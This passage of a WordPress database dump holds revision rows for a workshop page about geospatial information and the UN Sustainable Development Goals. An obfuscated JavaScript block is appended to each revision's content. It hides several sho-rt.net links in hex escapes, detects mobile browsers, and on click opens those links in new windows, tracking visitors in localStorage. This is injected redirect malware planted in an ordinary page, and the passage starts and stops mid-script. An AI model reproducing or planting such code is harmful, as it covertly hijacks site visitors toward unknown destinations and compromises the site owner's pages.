)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The Geospatial Information and SDG Nexus: GI4SDGs','','inherit','closed','closed','','2768-revision-v1','','','2022-10-13 23:50:32','2022-10-13 23:50:32','',2768,'https://gsw2023.com/?p=2779',0,'revision','',0),
(2780,1,'2022-10-13 23:51:03','2022-10-13 23:51:03','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2770\" img_size=\"1400x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\">In September 2015, the United Nations adopted “Transforming Our World: the 2030 Agenda for Sustainable Development” as a new ambitious global development plan with 17 Sustainable Development Goals (SDGs) and 169 targets. Recognizing the complex and diverse challenges the world is facing today, this agenda aims to end extreme poverty, fight inequality and injustice, and combat climate change. In order to ensure its successful implementation, the United Nations has been devoting to establishing a systematic follow-up and review of the progress towards SDGs at national, regional and global levels, through an indicator-based and data-driven monitoring approach.</h5>\n<h5 style=\"text-align:justify; color:black;\">Reliable and up-to-date geospatial data plays a fundamental role in the monitoring process, and the utilization of geospatial tools in SDGs monitoring has become a critical task for ISPRS and international geospatial communities. In the year 2019, ISPRS council has decided to set up a scientific program on “Geospatial Information-enabled SDGs Monitoring for the 2030 Agenda”, jointly with other international organizations. Its overreaching goal is to promote the best use of geospatial information in supporting SDGs monitoring and analysis through mobilizing and integrating all possible resources from ISPRS members and other stakeholders. The first ISPRS workshop on Geospatial Information for Sustainable Development Goals (GI4SDGs) was successfully organized in Changsha, China from Nov.19-20, 2019.</h5>\n<h5 style=\"text-align:justify; color:black;\">This second GI4SDGs workshop will provide an interdisciplinary platform to present the latest development and progress in the area of geospatial-enabled SDG monitoring and application. It will bring together people of different communities and disciplines, such as geomatics and remote sensing, environmental and urban studies, deep learning and service computing. Experts and users will present their novel and innovative methods to highlight successful case studies and to explore possible collaboration.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>The workshop will concentrate on the following topics:</strong></h5>\n<h6><strong>⦁ Opportunities and challenges of geospatial information-enabled SDGs;</strong></h6>\n<h6><strong>⦁ SDGs monitoring examples with geospatial perspective;</strong></h6>\n<h6><strong>⦁ Definition and modeling of geospatial essential variables for SDGs monitoring;</strong></h6>\n<h6><strong>⦁ Algorithms and methods for deriving geospatial essential variables, e.g., machine learning, big data analytics, cloud computing and other technologies;</strong></h6>\n<h6><strong>⦁ Global mapping initiatives and progresses at national and international levels;</strong></h6>\n<h6><strong>⦁ Integrating crowd-sourced data and VGI with geospatial data for SDGs monitoring;</strong></h6>\n<h6><strong>⦁ Developments and applications of geospatial knowledge service and collaborative platforms to meet SDGs assessment and monitoring;</strong></h6>\n<h6><strong>⦁ Ethical use of geospatial data and SDGs</strong></h6>\n<h6><strong>⦁ Other related topics.</strong></h6>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>The workshop plans to have the following four technical sessions:</strong></h5>\n<h6><strong>⦁ Session 1: Assessing SDGs progress by integrating geospatial and statistical information</strong></h6>\n<h6><strong>⦁ Session 2: Extracting Geospatial Information for SDGs</strong></h6>\n<h6><strong>⦁ Session 3: Monitoring SDGs with geospatially essential variables</strong></h6>\n<h6><strong>⦁ Session 4: ISPRS Scientific Program GI4SDGs: Progress and Collaboration</strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The Geospatial Information and SDG Nexus: GI4SDGs','','inherit','closed','closed','','2768-revision-v1','','','2022-10-13 23:51:03','2022-10-13 23:51:03','',2768,'https://gsw2023.com/?p=2780',0,'revision','',0),
(2781,1,'2022-10-13 23:51:23','2022-10-13 23:51:23','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2770\" img_size=\"1400x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\">In September 2015, the United Nations adopted “Transforming Our World: the 2030 Agenda for Sustainable Development” as a new ambitious global development plan with 17 Sustainable Development Goals (SDGs) and 169 targets. Recognizing the complex and diverse challenges the world is facing today, this agenda aims to end extreme poverty, fight inequality and injustice, and combat climate change. In order to ensure its successful implementation, the United Nations has been devoting to establishing a systematic follow-up and review of the progress towards SDGs at national, regional and global levels, through an indicator-based and data-driven monitoring approach.</h5>\n<h5 style=\"text-align:justify; color:black;\">Reliable and up-to-date geospatial data plays a fundamental role in the monitoring process, and the utilization of geospatial tools in SDGs monitoring has become a critical task for ISPRS and international geospatial communities. In the year 2019, ISPRS council has decided to set up a scientific program on “Geospatial Information-enabled SDGs Monitoring for the 2030 Agenda”, jointly with other international organizations. Its overreaching goal is to promote the best use of geospatial information in supporting SDGs monitoring and analysis through mobilizing and integrating all possible resources from ISPRS members and other stakeholders. The first ISPRS workshop on Geospatial Information for Sustainable Development Goals (GI4SDGs) was successfully organized in Changsha, China from Nov.19-20, 2019.</h5>\n<h5 style=\"text-align:justify; color:black;\">This second GI4SDGs workshop will provide an interdisciplinary platform to present the latest development and progress in the area of geospatial-enabled SDG monitoring and application. It will bring together people of different communities and disciplines, such as geomatics and remote sensing, environmental and urban studies, deep learning and service computing. Experts and users will present their novel and innovative methods to highlight successful case studies and to explore possible collaboration.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>The workshop will concentrate on the following topics:</strong></h5>\n<h6><strong>⦁ Opportunities and challenges of geospatial information-enabled SDGs;</strong></h6>\n<h6><strong>⦁ SDGs monitoring examples with geospatial perspective;</strong></h6>\n<h6><strong>⦁ Definition and modeling of geospatial essential variables for SDGs monitoring;</strong></h6>\n<h6><strong>⦁ Algorithms and methods for deriving geospatial essential variables, e.g., machine learning, big data analytics, cloud computing and other technologies;</strong></h6>\n<h6><strong>⦁ Global mapping initiatives and progresses at national and international levels;</strong></h6>\n<h6><strong>⦁ Integrating crowd-sourced data and VGI with geospatial data for SDGs monitoring;</strong></h6>\n<h6><strong>⦁ Developments and applications of geospatial knowledge service and collaborative platforms to meet SDGs assessment and monitoring;</strong></h6>\n<h6><strong>⦁ Ethical use of geospatial data and SDGs</strong></h6>\n<h6><strong>⦁ Other related topics.</strong></h6>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>The workshop plans to have the following four technical sessions:</strong></h5>\n<h6><strong>⦁ Session 1: Assessing SDGs progress by integrating geospatial and statistical information</strong></h6>\n<h6><strong>⦁ Session 2: Extracting Geospatial Information for SDGs</strong></h6>\n<h6><strong>⦁ Session 3: Monitoring SDGs with geospatially essential variables</strong></h6>\n<h6><strong>⦁ Session 4: ISPRS Scientific Program GI4SDGs: Progress and Collaboration</strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 